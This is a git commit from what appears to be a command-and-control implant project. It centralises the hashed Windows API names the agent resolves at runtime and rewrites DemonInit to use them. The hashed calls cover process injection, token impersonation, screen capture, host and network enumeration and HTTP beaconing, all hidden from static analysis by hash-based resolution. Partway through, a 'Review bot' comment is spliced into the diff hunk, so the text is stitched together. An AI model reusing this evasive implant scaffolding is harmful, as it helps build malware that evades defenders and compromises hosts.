define all hashes on Defines.h

This commit is contained in:
S4ntiagoP
2023-02-28 14:20:10 -03:00
parent c2a81bde1f
commit 0e82433e98
5 changed files with 418 additions and 233 deletions
-4
@@ -5,10 +5,6 @@
Client/Build
**/cmake-build-debug/
# ignore binaries
**/bin/
**/Bin/
# dont commit your loot
Teamserver/data/loot/
+206 -18
@@ -13,24 +13,212 @@
#endif
// Hashes for the dynamic winapi loading via a hashing algorithm
#define FuncHash_GetTokenInformation 881854923972837164
#define FuncHash_CreatePipe 8244700854143020775
#define FuncHash_ReadFile 7571513842702625
#define FuncHash_RevertToSelf 14100625964972061354
#define FuncHash_Sleep 210689975806
#define FuncHash_TerminateProcess 3268205303374481261
#define FuncHash_GetUserNameA 13544547492196232006
#define FuncHash_ExitProcess 13824059171100242846
#define FuncHash_RtlGetVersion 4893460183577242141
#define FuncHash_RtlCreateUserThread 1016696724611196162
#define FuncHash_ResumeThread 14100509000585325166
#define FuncHash_OpenThread 8245254994680133519
#define FuncHash_Thread32Next 14206118522476693985
#define FuncHash_Thread32First 7633309398982761034
#define FuncHash_VirtualProtectEx 5341311935265804842
#define FuncHash_LookupAccountSidA 3739427023317208365
#define FuncHash_InitializeProcThreadAttributeList 6595998938373999155
#define FuncHash_UpdateProcThreadAttribute 6332977549253614184
#define FuncHash_LdrGetProcedureAddress 0x2e5a99f6
#define FuncHash_LdrLoadDll 0x0307db23
#define FuncHash_RtlAllocateHeap 0xc0b381da
#define FuncHash_RtlReAllocateHeap 0xc0b381da
#define FuncHash_RtlFreeHeap 0x70ba71d7
#define FuncHash_RtlExitUserThread 0x8e492b88
#define FuncHash_RtlExitUserProcess 0x3aa1f0ef
#define FuncHash_RtlRandomEx 0x7c3439f5
#define FuncHash_RtlNtStatusToDosError 0x35abf270
#define FuncHash_RtlGetVersion 0x3ca3aa1d
#define FuncHash_RtlCreateTimerQueue 0xf78fb211
#define FuncHash_RtlCreateTimer 0xa5de7c4c
#define FuncHash_RtlDeleteTimerQueue 0x9561fe90
#define FuncHash_RtlCaptureContext 0x7733eed0
#define FuncHash_RtlAddVectoredExceptionHandler 0x554bafa9
#define FuncHash_RtlRemoveVectoredExceptionHandler 0x880c210e
#define FuncHash_CreateThread 0x7f08f451
#define FuncHash_NtClose 0x8b8e133d
#define FuncHash_NtCreateEvent 0xca58747d
#define FuncHash_NtSetEvent 0x4514bd95
#define FuncHash_VirtualProtectEx 0xd812922a
#define FuncHash_VirtualProtect 0x844ff18d
#define FuncHash_LocalAlloc 0x73cebc5b
#define FuncHash_LocalReAlloc 0xabad9db2
#define FuncHash_LocalFree 0xa66df372
#define FuncHash_CreateRemoteThread 0xaa30775d
#define FuncHash_CreateToolhelp32Snapshot 0x66851295
#define FuncHash_CreatePipe 0x9a8deee7
#define FuncHash_CreateProcessA 0xaeb52e19
#define FuncHash_CreateFileW 0xeb96c610
#define FuncHash_GetFullPathNameW 0x3524e9fd
#define FuncHash_GetFileSize 0x7891c520
#define FuncHash_CreateNamedPipeW 0x28fe1c03
#define FuncHash_ConvertFiberToThread 0x1f194e49
#define FuncHash_CreateFiberEx 0x2bac113e
#define FuncHash_ReadFile 0x71019921
#define FuncHash_VirtualAllocEx 0xf36e5ab4
#define FuncHash_WaitForSingleObjectEx 0x56bd0197
#define FuncHash_ResumeThread 0x74162a6e
#define FuncHash_OpenThread 0x806cb78f
#define FuncHash_Thread32Next 0x695209e1
#define FuncHash_Thread32First 0x93049a4a
#define FuncHash_GetComputerNameExA 0xd252a5f3
#define FuncHash_ExitProcess 0xb769339e
#define FuncHash_GetExitCodeProcess 0xe21026f9
#define FuncHash_GetExitCodeThread 0xb263c852
#define FuncHash_TerminateProcess 0x60af076d
#define FuncHash_GetTickCount 0x41ad16b9
#define FuncHash_ReadProcessMemory 0xb8932459
#define FuncHash_ConvertThreadToFiberEx 0xac22a286
#define FuncHash_SwitchToFiber 0xc2d09e02
#define FuncHash_DeleteFiber 0x1cd85cc0
#define FuncHash_GetThreadContext 0xeba2cfc2
#define FuncHash_SetThreadContext 0x7e20964e
#define FuncHash_AllocConsole 0xcddb7fc3
#define FuncHash_FreeConsole 0x8afb8c5a
#define FuncHash_GetConsoleWindow 0xe1db2410
#define FuncHash_GetStdHandle 0xf178843c
#define FuncHash_SetStdHandle 0x3ce0e4c8
#define FuncHash_WaitNamedPipeW 0x085741c4
#define FuncHash_PeekNamedPipe 0x94f08b9d
#define FuncHash_DisconnectNamedPipe 0x55668f42
#define FuncHash_WriteFile 0x663cecb0
#define FuncHash_ConnectNamedPipe 0xc003c602
#define FuncHash_GetCurrentDirectoryW 0x2ced73f4
#define FuncHash_GetFileAttributesW 0xcc9c6ce3
#define FuncHash_FindFirstFileW 0xae2636e5
#define FuncHash_FindNextFileW 0xf3b43c5c
#define FuncHash_FindClose 0xb4e7451c
#define FuncHash_FileTimeToSystemTime 0x1fb7928b
#define FuncHash_SystemTimeToTzSpecificLocalTime 0x99a3156a
#define FuncHash_RemoveDirectoryW 0x4192723f
#define FuncHash_DeleteFileW 0x1cd8872f
#define FuncHash_CreateDirectoryW 0x41fac005
#define FuncHash_CopyFileW 0xac2253d7
#define FuncHash_InitializeProcThreadAttributeList 0x5ca2ca33
#define FuncHash_UpdateProcThreadAttribute 0x09c91a68
#define FuncHash_SetCurrentDirectoryW 0xbec3a080
#define FuncHash_Wow64DisableWow64FsRedirection 0xd859b1d8
#define FuncHash_Wow64RevertWow64FsRedirection 0x72f47e1c
#define FuncHash_GetModuleHandleA 0x5a153f58
#define FuncHash_NtOpenProcess 0x5003c058
#define FuncHash_NtQueryInformationProcess 0xd034fc62
#define FuncHash_NtQuerySystemInformation 0xee4f73a8
#define FuncHash_NtAllocateVirtualMemory 0x6793c34c
#define FuncHash_NtQueueApcThread 0xd4612238
#define FuncHash_NtOpenThread 0xfb8a31d1
#define FuncHash_NtResumeThread 0x2c7b3d30
#define FuncHash_NtSuspendThread 0x50febd61
#define FuncHash_NtCreateEvent 0xca58747d
#define FuncHash_NtDuplicateObject 0x2388ee19
#define FuncHash_NtGetContextThread 0x9e0e1a44
#define FuncHash_NtSetContextThread 0x308be0d0
#define FuncHash_NtWaitForSingleObject 0x4c6dc63c
#define FuncHash_NtAlertResumeThread 0x482e8408
#define FuncHash_NtSignalAndWaitForSingleObject 0x7bdd15cd
#define FuncHash_NtTestAlert 0x7915b7df
#define FuncHash_NtCreateThreadEx 0xcb0c2130
#define FuncHash_NtOpenProcessToken 0x7bd07459
#define FuncHash_NtDuplicateToken 0x3000ecc3
#define FuncHash_NtProtectVirtualMemory 0x082962c8
#define FuncHash_NtTerminateThread 0xac3c9dc8
#define FuncHash_NtWriteVirtualMemory 0x95f3a792
#define FuncHash_NtContinue 0x780a612c
#define FuncHash_NtReadVirtualMemory 0xc24062e3
#define FuncHash_NtFreeVirtualMemory 0x471aa7e9
#define FuncHash_NtQueryVirtualMemory 0xe39d8e5d
#define FuncHash_NtQueryInformationToken 0x2ce5a244
#define FuncHash_NtQueryInformationThread 0xc91f149b
#define FuncHash_GetTokenInformation 881854923972837164
#define FuncHash_CreateProcessWithTokenW 0x94e76e4c
#define FuncHash_CreateProcessWithLogonW 0x823c224a
#define FuncHash_RevertToSelf 14100625964972061354
#define FuncHash_GetUserNameA 13544547492196232006
#define FuncHash_LogonUserA 0x609d56e4
#define FuncHash_LookupPrivilegeValueA 0xbbae6e84
#define FuncHash_LookupAccountSidA 3739427023317208365
#define FuncHash_OpenThreadToken 579177116578842096
#define FuncHash_OpenProcessToken 0xc57bd097
#define FuncHash_ImpersonateLoggedOnUser 0xa6ffd55a
#define FuncHash_AdjustTokenPrivileges 0xce4cd9cb
#define FuncHash_LookupPrivilegeNameA 0xe6176fe8
#define FuncHash_SystemFunction032 0xcccf3585
#define FuncHash_FreeSid 0x2174ce07
#define FuncHash_SetSecurityDescriptorSacl 0x4a8307ab
#define FuncHash_SetSecurityDescriptorDacl 0x4a7acdfc
#define FuncHash_InitializeSecurityDescriptor 0x70670cee
#define FuncHash_AddMandatoryAce 0x248cc186
#define FuncHash_InitializeAcl 0x62cac4c7
#define FuncHash_AllocateAndInitializeSid 0x57a4ccf
#define FuncHash_SetEntriesInAclW 0xe2d6b8e9
#define FuncHash_SetThreadToken 0x575b17ca
#define FuncHash_SafeArrayAccessData 2675336209888825647
#define FuncHash_SafeArrayUnaccessData 18329906161741280562
#define FuncHash_SafeArrayCreate 3571287155138900375
#define FuncHash_SafeArrayPutElement 2676058380407465830
#define FuncHash_SafeArrayCreateVector 17426458116918762890
#define FuncHash_SafeArrayDestroy 7172011678126394509
#define FuncHash_SysAllocString 3847978704220612774
#define FuncHash_CommandLineToArgvW 0x8d607276
#define FuncHash_vsnprintf 0xe61d840f
#define FuncHash_ShowWindow 8245429827274884638
#define FuncHash_GetSystemMetrics 0xa988c1a1
#define FuncHash_GetDC 0xd3d24ac
#define FuncHash_ReleaseDC 0xe43871cd
#define FuncHash_GetCurrentObject 0xd41e47df
#define FuncHash_GetObjectW 0x512b413
#define FuncHash_CreateCompatibleDC 0xa05cbae0
#define FuncHash_CreateDIBSection 0xfff5b73d
#define FuncHash_SelectObject 0x7cf4fd7c
#define FuncHash_BitBlt 0xa9804e46
#define FuncHash_DeleteObject 0xcc68186f
#define FuncHash_DeleteDC 0x9f3bef5f
#define FuncHash_SetProcessValidCallTargets 0xbb6970d6
#define FuncHash_WinHttpOpen 0x5e4f39e5
#define FuncHash_WinHttpConnect 0x7242c17d
#define FuncHash_WinHttpOpenRequest 0xeab7b9ce
#define FuncHash_WinHttpSetOption 0xa18b94f8
#define FuncHash_WinHttpCloseHandle 0x36220cd5
#define FuncHash_WinHttpSendRequest 0xb183faa6
#define FuncHash_WinHttpAddRequestHeaders 0xed7fcb41
#define FuncHash_WinHttpReceiveResponse 0x146c4925
#define FuncHash_WinHttpWebSocketCompleteUpgrade 0x58929db
#define FuncHash_WinHttpQueryDataAvailable 0x34cb8684
#define FuncHash_WinHttpReadData 0x7195e4e9
#define FuncHash_WinHttpQueryHeaders 0x389cefa5
#define FuncHash_CLRCreateInstance 10918823944048432655
#define FuncHash_GetAdaptersInfo 0xbc950fc5
#define FuncHash_NetLocalGroupEnum 0x2c3fa6b9
#define FuncHash_NetGroupEnum 0xb278fc6e
#define FuncHash_NetUserEnum 0xe84c1c20
#define FuncHash_NetWkstaUserEnum 0x3f45a8a
#define FuncHash_NetSessionEnum 0x80edcd45
#define FuncHash_NetShareEnum 0xb0461db4
#define FuncHash_NetApiBufferFree 0x83e6be2
#define FuncHash_WSAStartup 0x6128c683
#define FuncHash_WSACleanup 0x7f1aab78
#define FuncHash_WSASocketA 0x559f159a
#define FuncHash_ioctlsocket 0x6dcd609
#define FuncHash_bind 0x7c9499e2
#define FuncHash_listen 0xb794014
#define FuncHash_accept 0xf15ae9b5
#define FuncHash_closesocket 0x494cb104
#define FuncHash_recv 0x7c9d4d95
#define FuncHash_send 0x7c9ddb4f
#define FuncHash_connect 0xd3764dcf
#define FuncHash_DnsQuery_A 0xeb04a380
//#define FuncHash_GetTokenInformation 881854923972837164
//#define FuncHash_CreatePipe 8244700854143020775
//#define FuncHash_ReadFile 7571513842702625
//#define FuncHash_RevertToSelf 14100625964972061354
//#define FuncHash_Sleep 210689975806
//#define FuncHash_TerminateProcess 3268205303374481261
//#define FuncHash_GetUserNameA 13544547492196232006
//#define FuncHash_ExitProcess 13824059171100242846
//#define FuncHash_RtlGetVersion 4893460183577242141
//#define FuncHash_RtlCreateUserThread 1016696724611196162
//#define FuncHash_ResumeThread 14100509000585325166
//#define FuncHash_OpenThread 8245254994680133519
//#define FuncHash_Thread32Next 14206118522476693985
//#define FuncHash_Thread32First 7633309398982761034
//#define FuncHash_VirtualProtectEx 5341311935265804842
//#define FuncHash_LookupAccountSidA 3739427023317208365
//#define FuncHash_InitializeProcThreadAttributeList 6595998938373999155
//#define FuncHash_UpdateProcThreadAttribute 6332977549253614184
// Beacon API
#define COFFAPI_BEACONDATAPARSER 0xe2494ba2
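Review bot: `FuncHash_NtCreateEvent` is defined twice in this hunk, once in the ntdll group and again in the syscall group, both as 0xca58747d; that compiles only as a benign redefinition while the two token sequences stay identical, so keep one definition and delete the other. The commented-out block of eighteen decimal hashes that follows `FuncHash_DnsQuery_A` repeats exactly the lines this hunk already removes and should be dropped rather than kept as dead code, since history preserves them. `FuncHash_RtlAllocateHeap` and `FuncHash_RtlReAllocateHeap` carry the same literal 0xc0b381da, which cannot be correct for two different export names, so the table is inconsistent there. The block also mixes 32-bit hex literals with 64-bit decimal ones (for example `FuncHash_GetTokenInformation` and the `SafeArray*` entries); if the lookup helpers take a 32-bit hash those decimal values would be truncated silently, so a comment above the table naming the expected width of each group would document the contract, e.g. `// NOTE: hex entries are 32-bit hashes, decimal entries are 64-bit — confirm each matches the width its lookup helper takes`.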
+208 -208
@@ -268,88 +268,88 @@ VOID DemonInit( VOID )
if ( ( ! Instance.Modules.Kernel32 ) || ( Instance.Modules.Ntdll ) )
{
// Ntdll
Instance.Win32.LdrGetProcedureAddress = LdrFunctionAddr( Instance.Modules.Ntdll, 0x2e5a99f6 );
Instance.Win32.LdrLoadDll = LdrFunctionAddr( Instance.Modules.Ntdll, 0x307db23 );
Instance.Win32.RtlAllocateHeap = LdrFunctionAddr( Instance.Modules.Ntdll, 0xc0b381da );
Instance.Win32.RtlReAllocateHeap = LdrFunctionAddr( Instance.Modules.Ntdll, 0xc0b381da );
Instance.Win32.RtlFreeHeap = LdrFunctionAddr( Instance.Modules.Ntdll, 0x70ba71d7 );
Instance.Win32.RtlExitUserThread = LdrFunctionAddr( Instance.Modules.Ntdll, 0x8e492b88 );
Instance.Win32.RtlExitUserProcess = LdrFunctionAddr( Instance.Modules.Ntdll, 0x3aa1f0ef );
Instance.Win32.RtlRandomEx = LdrFunctionAddr( Instance.Modules.Ntdll, 0x7c3439f5 );
Instance.Win32.RtlNtStatusToDosError = LdrFunctionAddr( Instance.Modules.Ntdll, 0x35abf270 );
Instance.Win32.RtlGetVersion = LdrFunctionAddr( Instance.Modules.Ntdll, 0x3ca3aa1d );
Instance.Win32.RtlCreateTimerQueue = LdrFunctionAddr( Instance.Modules.Ntdll, 0xf78fb211 );
Instance.Win32.RtlCreateTimer = LdrFunctionAddr( Instance.Modules.Ntdll, 0xa5de7c4c );
Instance.Win32.RtlDeleteTimerQueue = LdrFunctionAddr( Instance.Modules.Ntdll, 0x9561fe90 );
Instance.Win32.RtlCaptureContext = LdrFunctionAddr( Instance.Modules.Ntdll, 0x7733eed0 );
Instance.Win32.RtlAddVectoredExceptionHandler = LdrFunctionAddr( Instance.Modules.Ntdll, 0x554bafa9 );
Instance.Win32.RtlRemoveVectoredExceptionHandler = LdrFunctionAddr( Instance.Modules.Ntdll, 0x880c210e );
Instance.Win32.NtClose = LdrFunctionAddr( Instance.Modules.Ntdll, 0x8b8e133d );
Instance.Win32.NtCreateEvent = LdrFunctionAddr( Instance.Modules.Ntdll, 0xca58747d );
Instance.Win32.NtSetEvent = LdrFunctionAddr( Instance.Modules.Ntdll, 0x4514bd95 );
Instance.Win32.LdrGetProcedureAddress = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_LdrGetProcedureAddress );
Instance.Win32.LdrLoadDll = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_LdrLoadDll );
Instance.Win32.RtlAllocateHeap = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_RtlAllocateHeap );
Instance.Win32.RtlReAllocateHeap = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_RtlReAllocateHeap );
Instance.Win32.RtlFreeHeap = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_RtlFreeHeap );
Instance.Win32.RtlExitUserThread = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_RtlExitUserThread );
Instance.Win32.RtlExitUserProcess = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_RtlExitUserProcess );
Instance.Win32.RtlRandomEx = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_RtlRandomEx );
Instance.Win32.RtlNtStatusToDosError = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_RtlNtStatusToDosError );
Instance.Win32.RtlGetVersion = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_RtlGetVersion );
Instance.Win32.RtlCreateTimerQueue = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_RtlCreateTimerQueue );
Instance.Win32.RtlCreateTimer = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_RtlCreateTimer );
Instance.Win32.RtlDeleteTimerQueue = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_RtlDeleteTimerQueue );
Instance.Win32.RtlCaptureContext = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_RtlCaptureContext );
Instance.Win32.RtlAddVectoredExceptionHandler = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_RtlAddVectoredExceptionHandler );
Instance.Win32.RtlRemoveVectoredExceptionHandler = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_RtlRemoveVectoredExceptionHandler );
Instance.Win32.NtClose = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtClose );
Instance.Win32.NtCreateEvent = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtCreateEvent );
Instance.Win32.NtSetEvent = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtSetEvent );
// Kernel32
Instance.Win32.VirtualProtectEx = LdrFunctionAddr( Instance.Modules.Kernel32, 0xd812922a );
Instance.Win32.VirtualProtect = LdrFunctionAddr( Instance.Modules.Kernel32, 0x844ff18d );
Instance.Win32.LocalAlloc = LdrFunctionAddr( Instance.Modules.Kernel32, 0x73cebc5b );
Instance.Win32.LocalReAlloc = LdrFunctionAddr( Instance.Modules.Kernel32, 0xabad9db2 );
Instance.Win32.LocalFree = LdrFunctionAddr( Instance.Modules.Kernel32, 0xa66df372 );
Instance.Win32.CreateRemoteThread = LdrFunctionAddr( Instance.Modules.Kernel32, 0xaa30775d );
Instance.Win32.CreateToolhelp32Snapshot = LdrFunctionAddr( Instance.Modules.Kernel32, 0x66851295 );
Instance.Win32.CreatePipe = LdrFunctionAddr( Instance.Modules.Kernel32, 0x9a8deee7 );
Instance.Win32.CreateProcessA = LdrFunctionAddr( Instance.Modules.Kernel32, 0xaeb52e19 );
Instance.Win32.CreateFileW = LdrFunctionAddr( Instance.Modules.Kernel32, 0xeb96c610 );
Instance.Win32.GetFullPathNameW = LdrFunctionAddr( Instance.Modules.Kernel32, 0x3524e9fd );
Instance.Win32.GetFileSize = LdrFunctionAddr( Instance.Modules.Kernel32, 0x7891c520 );
Instance.Win32.CreateNamedPipeW = LdrFunctionAddr( Instance.Modules.Kernel32, 0x28fe1c03 );
Instance.Win32.ConvertFiberToThread = LdrFunctionAddr( Instance.Modules.Kernel32, 0x1f194e49 );
Instance.Win32.CreateFiberEx = LdrFunctionAddr( Instance.Modules.Kernel32, 0x2bac113e );
Instance.Win32.ReadFile = LdrFunctionAddr( Instance.Modules.Kernel32, 0x71019921 );
Instance.Win32.VirtualAllocEx = LdrFunctionAddr( Instance.Modules.Kernel32, 0xf36e5ab4 );
Instance.Win32.WaitForSingleObjectEx = LdrFunctionAddr( Instance.Modules.Kernel32, 0x56bd0197 );
Instance.Win32.ResumeThread = LdrFunctionAddr( Instance.Modules.Kernel32, 0x74162a6e );
Instance.Win32.OpenThread = LdrFunctionAddr( Instance.Modules.Kernel32, 0x806cb78f );
Instance.Win32.Thread32Next = LdrFunctionAddr( Instance.Modules.Kernel32, 0x695209e1 );
Instance.Win32.Thread32First = LdrFunctionAddr( Instance.Modules.Kernel32, 0x93049a4a );
Instance.Win32.GetComputerNameExA = LdrFunctionAddr( Instance.Modules.Kernel32, 0xd252a5f3 );
Instance.Win32.ExitProcess = LdrFunctionAddr( Instance.Modules.Kernel32, 0xb769339e );
Instance.Win32.GetExitCodeProcess = LdrFunctionAddr( Instance.Modules.Kernel32, 0xe21026f9 );
Instance.Win32.GetExitCodeThread = LdrFunctionAddr( Instance.Modules.Kernel32, 0xb263c852 );
Instance.Win32.TerminateProcess = LdrFunctionAddr( Instance.Modules.Kernel32, 0x60af076d );
Instance.Win32.GetTickCount = LdrFunctionAddr( Instance.Modules.Kernel32, 0x41ad16b9 );
Instance.Win32.ReadProcessMemory = LdrFunctionAddr( Instance.Modules.Kernel32, 0xb8932459 );
Instance.Win32.ConvertThreadToFiberEx = LdrFunctionAddr( Instance.Modules.Kernel32, 0xac22a286 );
Instance.Win32.SwitchToFiber = LdrFunctionAddr( Instance.Modules.Kernel32, 0xc2d09e02 );
Instance.Win32.DeleteFiber = LdrFunctionAddr( Instance.Modules.Kernel32, 0x1cd85cc0 );
Instance.Win32.GetThreadContext = LdrFunctionAddr( Instance.Modules.Kernel32, 0xeba2cfc2 );
Instance.Win32.SetThreadContext = LdrFunctionAddr( Instance.Modules.Kernel32, 0x7e20964e );
Instance.Win32.AllocConsole = LdrFunctionAddr( Instance.Modules.Kernel32, 0xcddb7fc3 );
Instance.Win32.FreeConsole = LdrFunctionAddr( Instance.Modules.Kernel32, 0x8afb8c5a );
Instance.Win32.GetConsoleWindow = LdrFunctionAddr( Instance.Modules.Kernel32, 0xe1db2410 );
Instance.Win32.GetStdHandle = LdrFunctionAddr( Instance.Modules.Kernel32, 0xf178843c );
Instance.Win32.SetStdHandle = LdrFunctionAddr( Instance.Modules.Kernel32, 0x3ce0e4c8 );
Instance.Win32.WaitNamedPipeW = LdrFunctionAddr( Instance.Modules.Kernel32, 0x85741c4 );
Instance.Win32.PeekNamedPipe = LdrFunctionAddr( Instance.Modules.Kernel32, 0x94f08b9d );
Instance.Win32.DisconnectNamedPipe = LdrFunctionAddr( Instance.Modules.Kernel32, 0x55668f42 );
Instance.Win32.WriteFile = LdrFunctionAddr( Instance.Modules.Kernel32, 0x663cecb0 );
Instance.Win32.ConnectNamedPipe = LdrFunctionAddr( Instance.Modules.Kernel32, 0xc003c602 );
Instance.Win32.GetCurrentDirectoryW = LdrFunctionAddr( Instance.Modules.Kernel32, 0x2ced73f4 );
Instance.Win32.GetFileAttributesW = LdrFunctionAddr( Instance.Modules.Kernel32, 0xcc9c6ce3 );
Instance.Win32.FindFirstFileW = LdrFunctionAddr( Instance.Modules.Kernel32, 0xae2636e5 );
Instance.Win32.FindNextFileW = LdrFunctionAddr( Instance.Modules.Kernel32, 0xf3b43c5c );
Instance.Win32.FindClose = LdrFunctionAddr( Instance.Modules.Kernel32, 0xb4e7451c );
Instance.Win32.FileTimeToSystemTime = LdrFunctionAddr( Instance.Modules.Kernel32, 0x1fb7928b );
Instance.Win32.SystemTimeToTzSpecificLocalTime = LdrFunctionAddr( Instance.Modules.Kernel32, 0x99a3156a );
Instance.Win32.RemoveDirectoryW = LdrFunctionAddr( Instance.Modules.Kernel32, 0x4192723f );
Instance.Win32.DeleteFileW = LdrFunctionAddr( Instance.Modules.Kernel32, 0x1cd8872f );
Instance.Win32.CreateDirectoryW = LdrFunctionAddr( Instance.Modules.Kernel32, 0x41fac005 );
Instance.Win32.CopyFileW = LdrFunctionAddr( Instance.Modules.Kernel32, 0xac2253d7 );
Instance.Win32.InitializeProcThreadAttributeList = LdrFunctionAddr( Instance.Modules.Kernel32, 0x5ca2ca33 );
Instance.Win32.UpdateProcThreadAttribute = LdrFunctionAddr( Instance.Modules.Kernel32, 0x9c91a68 );
Instance.Win32.SetCurrentDirectoryW = LdrFunctionAddr( Instance.Modules.Kernel32, 0xbec3a080 );
Instance.Win32.Wow64DisableWow64FsRedirection = LdrFunctionAddr( Instance.Modules.Kernel32, 0xd859b1d8 );
Instance.Win32.Wow64RevertWow64FsRedirection = LdrFunctionAddr( Instance.Modules.Kernel32, 0x72f47e1c );
Instance.Win32.GetModuleHandleA = LdrFunctionAddr( Instance.Modules.Kernel32, 0x5a153f58 );
Instance.Win32.VirtualProtectEx = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_VirtualProtectEx );
Instance.Win32.VirtualProtect = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_VirtualProtect );
Instance.Win32.LocalAlloc = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_LocalAlloc );
Instance.Win32.LocalReAlloc = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_LocalReAlloc );
Instance.Win32.LocalFree = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_LocalFree );
Instance.Win32.CreateRemoteThread = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_CreateRemoteThread );
Instance.Win32.CreateToolhelp32Snapshot = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_CreateToolhelp32Snapshot );
Instance.Win32.CreatePipe = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_CreatePipe );
Instance.Win32.CreateProcessA = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_CreateProcessA );
Instance.Win32.CreateFileW = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_CreateFileW );
Instance.Win32.GetFullPathNameW = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_GetFullPathNameW );
Instance.Win32.GetFileSize = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_GetFileSize );
Instance.Win32.CreateNamedPipeW = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_CreateNamedPipeW );
Instance.Win32.ConvertFiberToThread = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_ConvertFiberToThread );
Instance.Win32.CreateFiberEx = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_CreateFiberEx );
Instance.Win32.ReadFile = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_ReadFile );
Instance.Win32.VirtualAllocEx = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_VirtualAllocEx );
Instance.Win32.WaitForSingleObjectEx = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_WaitForSingleObjectEx );
Instance.Win32.ResumeThread = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_ResumeThread );
Instance.Win32.OpenThread = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_OpenThread );
Instance.Win32.Thread32Next = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_Thread32Next );
Instance.Win32.Thread32First = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_Thread32First );
Instance.Win32.GetComputerNameExA = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_GetComputerNameExA );
Instance.Win32.ExitProcess = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_ExitProcess );
Instance.Win32.GetExitCodeProcess = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_GetExitCodeProcess );
Instance.Win32.GetExitCodeThread = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_GetExitCodeThread );
Instance.Win32.TerminateProcess = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_TerminateProcess );
Instance.Win32.GetTickCount = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_GetTickCount );
Instance.Win32.ReadProcessMemory = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_ReadProcessMemory );
Instance.Win32.ConvertThreadToFiberEx = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_ConvertThreadToFiberEx );
Instance.Win32.SwitchToFiber = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_SwitchToFiber );
Instance.Win32.DeleteFiber = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_DeleteFiber );
Instance.Win32.GetThreadContext = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_GetThreadContext );
Instance.Win32.SetThreadContext = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_SetThreadContext );
Instance.Win32.AllocConsole = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_AllocConsole );
Instance.Win32.FreeConsole = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_FreeConsole );
Instance.Win32.GetConsoleWindow = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_GetConsoleWindow );
Instance.Win32.GetStdHandle = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_GetStdHandle );
Instance.Win32.SetStdHandle = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_SetStdHandle );
Instance.Win32.WaitNamedPipeW = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_WaitNamedPipeW );
Instance.Win32.PeekNamedPipe = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_PeekNamedPipe );
Instance.Win32.DisconnectNamedPipe = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_DisconnectNamedPipe );
Instance.Win32.WriteFile = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_WriteFile );
Instance.Win32.ConnectNamedPipe = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_ConnectNamedPipe );
Instance.Win32.GetCurrentDirectoryW = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_GetCurrentDirectoryW );
Instance.Win32.GetFileAttributesW = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_GetFileAttributesW );
Instance.Win32.FindFirstFileW = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_FindFirstFileW );
Instance.Win32.FindNextFileW = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_FindNextFileW );
Instance.Win32.FindClose = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_FindClose );
Instance.Win32.FileTimeToSystemTime = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_FileTimeToSystemTime );
